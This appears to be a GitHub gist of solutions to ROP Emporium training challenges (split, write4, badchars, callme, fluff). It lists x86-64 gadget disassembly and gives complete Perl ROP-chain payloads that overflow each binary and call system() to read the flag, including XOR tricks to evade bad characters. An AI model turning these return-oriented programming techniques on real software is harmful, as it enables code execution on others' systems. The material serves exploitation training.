@stek29
Last active January 4, 2018 20:59
ropemporium

ROP Emporium

import struct
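def dumpx(x):
    r"""Return the 8-byte little-endian encoding of *x* as ``\xNN`` escapes.

    Args:
        x: integer in the unsigned 64-bit range; anything ``'<Q'`` cannot
           pack raises ``struct.error``.

    Returns:
        A string such as ``'\x34\x0b\x40\x00\x00\x00\x00\x00'`` (literal
        backslashes, not control characters), ready to be pasted into a
        double-quoted Perl or Python literal.
    """
    # bytearray() yields ints on both Python 2 and 3, so the %02x format is
    # valid either way (iterating a py2 str would yield 1-char strings).
    # A generator expression with its own loop name also avoids shadowing
    # the parameter ``x`` inside the mapping.
    return ''.join('\\x%02x' % byte for byte in bytearray(struct.pack('<Q', x)))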
def d(x):
    """Print *x* as a Perl ``print "...";`` statement holding its escaped bytes."""
    escaped = dumpx(x)
    print('print "%s";' % escaped)
gadget-1:
0000000000400b34 movq %r12, (%r13)
0000000000400b38 ret
gadget 0:
0000000000400b3b popq %r12
0000000000400b3d popq %r13
0000000000400b3f ret
gadget 1:
0000000000400bb0 popq %r14
0000000000400bb2 popq %r15
0000000000400bb4 ret
gadget 2:
usefulGadgets:
0000000000400b30 xorb %r14b, (%r15)
0000000000400b33 ret
gadget 3: (mid-instruction)
0000000000400bb3 popq %rdi
0000000000400bb4 ret
gadget 4:
00000000004009e8 call j_system
data section starts at 0x601070 (see the objdump output below) and its size is 0x10
❯ objdump -h write4 | grep \\.data
24 .data 00000010 0000000000601070 0000000000601070 00001050 2**3
cat *xt\0 = \x63\x61\x74\x20\x2a\x78\x74\x00
0x63 and 0x20 are badchars
so we XOR the bytes at STR and STR+3 back into place;
however, if we placed STR at 0x601070 we would need to XOR at 0x601073,
and 0x601073 is itself prohibited (its low byte is a bad character),
so we place STR at 0x601071 instead
perl -e '
print "x"x40; # filler: 0x20 of locals + 0x8 saved rbp
print "\x3b\x0b\x40\0\0\0\0\0\x64\x61\x74\x27\x2a\x78\x74\x00\x71\x10\x60\0\0\0\0\0"; # ret to 0x400b3b (popq r12; popq r13): r12 = "cat *xt\0" with only the two bad bytes (0x63, 0x20) pre-xored with 0x07, r13 = 0x601071 (STR)
print "\x34\x0b\x40\0\0\0\0\0"; # ret to 0x400b34 (movq r12, (r13)): store the encoded string at STR
print "\xb0\x0b\x40\0\0\0\0\0\x07\x00\x00\x00\x00\x00\x00\x00\x71\x10\x60\0\0\0\0\0"; # ret to 0x400bb0 (popq r14; popq r15): r14 = 0x07, r15 = STR
print "\x30\x0b\x40\0\0\0\0\0"; # ret to 0x400b30 (xorb r14b, (r15)): STR[0] becomes 0x63 again
print "\xb0\x0b\x40\0\0\0\0\0\x07\x00\x00\x00\x00\x00\x00\x00\x74\x10\x60\0\0\0\0\0"; # same pop gadget: r14 = 0x07, r15 = 0x601074 (STR+3)
print "\x30\x0b\x40\0\0\0\0\0"; # same xorb gadget: STR[3] becomes 0x20 again
print "\xb3\x0b\x40\0\0\0\0\0\x71\x10\x60\0\0\0\0\0"; # ret to 0x400bb3 (popq rdi, mid-instruction): rdi = STR
print "\xe8\x09\x40\0\0\0\0\0"; # ret to 0x4009e8 (call j_system)
print "\n";
' | ./badchars
pwned :)
0x20 (32) local vars
0x08 ( 8) rbp
---
0x08 ( 8) ret addr
0x100 (256) bytes are read, so there are 0xd8 (216) bytes of overwrite
exactly what we need kek:
usefulGadgets:
0000000000401ab0 popq %rdi
0000000000401ab1 popq %rsi
0000000000401ab2 popq %rdx
0000000000401ab3 ret
0x28 (40) of garbage
0x20 0x401ab0, 0x1, 0x2, 0x3
0x08 0x401850
0x20 0x401ab0, 0x1, 0x2, 0x3
0x08 0x401870
0x20 0x401ab0, 0x1, 0x2, 0x3
0x08 0x401810
so, 0x28 * 3 of payload -- 0x78 (120) bytes
perl -e '
print "x"x40; # filler: 0x20 of locals + 0x8 saved rbp
print "\xb0\x1a\x40\0\0\0\0\0\x01\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0"; # ret to 0x401ab0 (popq rdi; popq rsi; popq rdx): args 1, 2, 3
print "\x50\x18\x40\0\0\0\0\0"; # ret to 0x401850
print "\xb0\x1a\x40\0\0\0\0\0\x01\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0"; # same pop gadget, same three args
print "\x70\x18\x40\0\0\0\0\0"; # ret to 0x401870
print "\xb0\x1a\x40\0\0\0\0\0\x01\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x03\0\0\0\0\0\0\0"; # same pop gadget, same three args
print "\x10\x18\x40\0\0\0\0\0"; # ret to 0x401810 (3 x 0x28 = 0x78 bytes of chain after the filler)
' | ./callme
j_system: // system
00000000004005e0 jmpq *system@GOT
----
00000000004008c3 popq %rdi
00000000004008c4 ret
----
questionableGadgets:
0000000000400820 popq %r15
0000000000400822 xorq %r11, %r11
0000000000400825 popq %r14
0000000000400827 movl __data_start, %edi
000000000040082c ret
000000000040082d popq %r14
000000000040082f xorq %r12, %r11
0000000000400832 popq %r12
0000000000400834 movl $0x604060, %r13d
000000000040083a ret
000000000040083b movl __data_start, %edi
0000000000400840 xchgq %r10, %r11
0000000000400843 popq %r15
0000000000400845 movl system@@GLIBC_2.2.5, %r11d
000000000040084b ret
000000000040084c popq %r15
000000000040084e movq %r11, (%r10)
0000000000400851 popq %r13
0000000000400853 popq %r12
0000000000400855 xorb %r12b, (%r10)
0000000000400858 ret
---
0000000000400845 * movl $0x602050, %r11d
000000000040084b x ret
---
0000000000400832 x * popq %r12
0000000000400834 movl $0x604060, %r13d
000000000040083a x ret
---
000000000040082f * xorq %r12, %r11
0000000000400832 x * popq %r12
0000000000400834 movl $0x604060, %r13d
000000000040083a x ret
---
0000000000400840 * xchgq %r10, %r11
0000000000400843 x popq %r15
0000000000400845 * movl $0x602050, %r11d
000000000040084b x ret
---
000000000040082f * xorq %r12, %r11
0000000000400832 x * popq %r12
0000000000400834 movl $0x604060, %r13d
000000000040083a x ret
---
000000000040084e * movq %r11, (%r10)
0000000000400851 x popq %r13
0000000000400853 x * popq %r12
0000000000400855 * xorb %r12b, (%r10)
0000000000400858 x ret
---
00000000004008c3 x * popq %rdi
00000000004008c4 x ret
---
00000000004005e0 jmpq *system@GOT
---
24 .data 00000010 0000000000601050 0000000000601050 00001050 2**3
CONTENTS, ALLOC, LOAD, DATA
cat *xt\0 = \x63\x61\x74\x20\x2a\x78\x74\x00
0x74782a20746163 ^ 0x602050 = 0x74782a20144133
\x33\x41\x14\x20\x2a\x78\x74\x00
0x601050
0x601050 ^ 0x602050 = 0x3000
\x00\x30\x00\x00\x00\x00\x00\x00
perl -e '
print "x"x40; # filler: 0x20 of locals + 0x8 saved rbp
print "\x45\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x400845: movl $0x602050, %r11d
print "\x32\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x400832: popq %r12 (the following movl into r13d is unused)
print "\x00\x30\x00\x00\x00\x00\x00\x00"; # r12 = 0x3000 = 0x601050 ^ 0x602050
print "\x2f\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x40082f: xorq %r12, %r11 -> r11 = 0x601050; then popq %r12
print "\x33\x41\x14\x20\x2a\x78\x74\x00"; # r12 = 0x74782a20746163 ("cat *xt\0") ^ 0x602050
print "\x40\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x400840: xchgq %r10, %r11 -> r10 = 0x601050; popq %r15; movl $0x602050, %r11d
print "\xde\xad\xfa\xce\xca\xfe\xba\xbe"; # garbage for r15
print "\x2f\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x40082f: xorq %r12, %r11 -> r11 = "cat *xt\0"; then popq %r12
print "\xde\xad\xfa\xce\xca\xfe\xba\xbe"; # garbage for r12
print "\x4e\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x40084e: movq %r11, (%r10) stores the string at 0x601050; popq %r13; popq %r12; xorb %r12b, (%r10)
print "\xde\xad\xfa\xce\xca\xfe\xba\xbe"; # garbage for r13
print "\x00\x00\x00\x00\x00\x00\x00\x00"; # r12 = 0 so the trailing xorb leaves *(%r10) unchanged
print "\xc3\x08\x40\x00\x00\x00\x00\x00"; # ret to 0x4008c3: popq %rdi
print "\x50\x10\x60\x00\x00\x00\x00\x00"; # rdi = 0x601050 (address of the string)
print "\xe0\x05\x40\x00\x00\x00\x00\x00"; # ret to 0x4005e0: jmpq *system@GOT
' | ./fluff
0x20 (32) local vars
0x08 ( 8) rbp
---
0x08 ( 8) ret addr
0x60 (96) bytes are read, so there are 0x38 (56) bytes of overwrite
'popq %r15' is
datgadget:
0000000000400883 popq %rdi
0000000000400884 ret
at 0x601060: "/bin/cat flag.txt"
perl -e '
print "x"x40; # filler: 0x20 of locals + 0x8 saved rbp
print "\x83\x08\x40\0\0\0\0\0"; # ret to datgadget 0x400883 (popq %rdi; ret)
print "\x60\x10\x60\0\0\0\0\0"; # rdi = 0x601060, address of "/bin/cat flag.txt"
print "\x10\x08\x40\0\0\0\0\0"; # ret to 0x400810 (call system)
' | ./split
gadget 1:
0000000000400890 popq %r14
0000000000400892 popq %r15
0000000000400894 ret
gadget 2:
usefulGadgets:
0000000000400820 movq %r15, (%r14)
0000000000400823 ret
gadget 3: (mid-instruction)
0000000000400893 popq %rdi
0000000000400894 ret
gadget 4:
0000000000400810 call j_system
data section starts at 0x601050 and size is 0x10
❯ objdump -h write4 | grep \\.data
24 .data 00000010 0000000000601050 0000000000601050 00001050 2**3
cat flag = \x63\x61\x74\x20\x66\x6c\x61\x67
.txt\0 = \x2e\x74\x78\x74\x00\x00\x00\x00
perl -e '
print "x"x40; # filler: 0x20 of locals + 0x8 saved rbp
print "\x90\x08\x40\0\0\0\0\0\x50\x10\x60\0\0\0\0\0\x63\x61\x74\x20\x66\x6c\x61\x67"; # ret to 0x400890 (popq r14; popq r15): r14 = 0x601050 (.data), r15 = "cat flag"
print "\x20\x08\x40\0\0\0\0\0"; # ret to 0x400820 (movq r15, (r14)): write the first 8 bytes
print "\x90\x08\x40\0\0\0\0\0\x58\x10\x60\0\0\0\0\0\x2e\x74\x78\x74\x00\x00\x00\x00"; # same pop gadget: r14 = 0x601058, r15 = ".txt\0"
print "\x20\x08\x40\0\0\0\0\0"; # same write gadget: write the NUL-terminated tail
print "\x93\x08\x40\0\0\0\0\0\x50\x10\x60\0\0\0\0\0"; # ret to 0x400893 (popq rdi, mid-instruction): rdi = 0x601050
print "\x10\x08\x40\0\0\0\0\0"; # ret to 0x400810 (call j_system)
' | ./write4